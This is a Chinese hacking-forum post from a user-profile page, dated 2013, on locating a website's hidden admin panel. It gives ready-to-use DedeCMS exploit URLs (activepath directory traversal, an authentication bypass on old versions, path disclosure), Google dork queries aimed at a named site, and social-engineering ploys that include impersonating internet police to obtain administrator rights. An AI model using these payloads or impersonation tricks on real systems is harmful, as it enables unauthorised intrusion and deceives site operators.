TA的每日心情 | 开心
2020-4-29 10:22 |
|---|
签到天数: 5 天 [LV.2]偶尔看看I
|
1、工具辅助查找
如大家常用的:明小子、啊D、wwwscan
以及一些列目录工具:AcunetixWeb Vulnerability Scanner 、JSky、Intell T a mper、Netsparker...等等
现在很多管理员都学着把后台登陆页面放其他位置,二B的很!
清凉网站后台扫描器V3.0内置的后台数据库也非常的全。
2、网站资源利用
如:网站根目录Robots.txt文本、图片路径爆后台、查看网站底部版权信息是否有连接、通过网站里的文件名查询源码下载得知
3、根据网站的漏洞
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
员帐号,新版本的就直接转向了后台.
include/dialog/config.php会爆出后台管理路径
include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
/dede/inc/inc_archives_functions.php
但是现在dedecms5.7sp1是无法爆后台地址的,dede会提示:提示:需输入后台管理目录才能登录
看来这个漏洞被修复了哈
4、搜索引擎查询
命令很多种列几种自己常用的吧:
site:hackseo.netintext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:hackseo.netinurl:login|admin|manage|manager|admin_login|login_admin|system
site:hackseo.netintitle:管理|后台|登陆|
site:hackseo.netintext:验证码
5、社会工程学
猜吧...
如:前段时间的CCTV http://chinvan.cctv.com/ChinvanAdmin/login.aspx看出什么没有这样的情况经常能碰到就是域名+admin
www.hackseo.net
hackseoadminhackseo_admin hackseomanage adminhackseo等等
或者注入的时候还可以根据数据库里的一些敏感名字猜管理地址,例如lz说的hackseo_admin。
这个要看运气了,祝大家好运~
————————————————————————————————————————————
直接问管理员:你们后台地址是多少,我试试能进去不?朋友告诉我你们网站的密码是adminadmin
猥琐的:注册个会员发表个反动文章,然后加管理qq,然后你就说我是网监,把这条新闻删了。给我加个管理员,方便我以后自己删……(我以前做站就遇到过),此方法t00ls首发,如有人利用此方法违法,本人不承担责任。
————————————————————————————————————————————
加管理员QQ,说要买他网站程序的源码,价钱出高点,让管理动心,然后让他给个后台和用户密码进后台看功能。。如果他不同意就让他QQ远程,这他应该会同意的。。。然后你就得到后台地址了。。。嘻嘻,金钱诱惑。。。
dedecms 5.5程序泄露网站路径信息。
测试地址:
http://www.dedecms.com/plus/paycenter/alipay/return_url.php
http://www.dedecms.com/plus/paycenter/cbpayment/autoreceive.php
http://www.dedecms.com/plus/paycenter/nps/config_pay_nps.php
http://www.dedecms.com/plus/task/dede-maketimehtml.php
http://www.dedecms.com/plus/task/dede-optimize-table.php
http://www.dedecms.com/plus/task/dede-upcache.php
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
员帐号,新版本的就直接转向了后台.
2.include/dialog/config.php会爆出后台管理路径
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
到根目录去.不过这些版本的访问地址有些不同.
地址为require/dialog/select_soft.php?activepath=/././././././././
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
include\dialog\select_images.php
include\dialog\select_media.php
include\dialog\select_templets.php
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。
这个时候大家可以尝试下在地址后面加上:
1、/include/dialog/select_media.php?f=form1.murl
2、/include/dialog/select_soft.php
但不一定通杀。。
以下为单色不单调整理的dede一些小问题,希望对大家有用:
DedeCmsV5.1 FreeSP1
访问 /include/dialog/select_soft.php?activepath=/include/FCKeditor可以跳转目录
跳转到根目录的方法为:
/include/dialog/select_soft.php?activepath=/././././././././
而且DEDECMS在访问不存在的目录时会报错
如访问 /include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的
构造 /include/dialog/select_soft.php?activepath=/include/FCKeditor也可以浏览此目录下的文件,当然你也可以跳到别的目录,但长度一定要大于设置中的目录。
不过前提是你要登陆下才能利用,这个就显得有点鸡肋了
另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉到根目录去。不过这些版本的访问地址有些不同。
地址为 /require/dialog/select_soft.php?activepath=/././././././././ |
|
发表于 2013-11-26 16:10:23
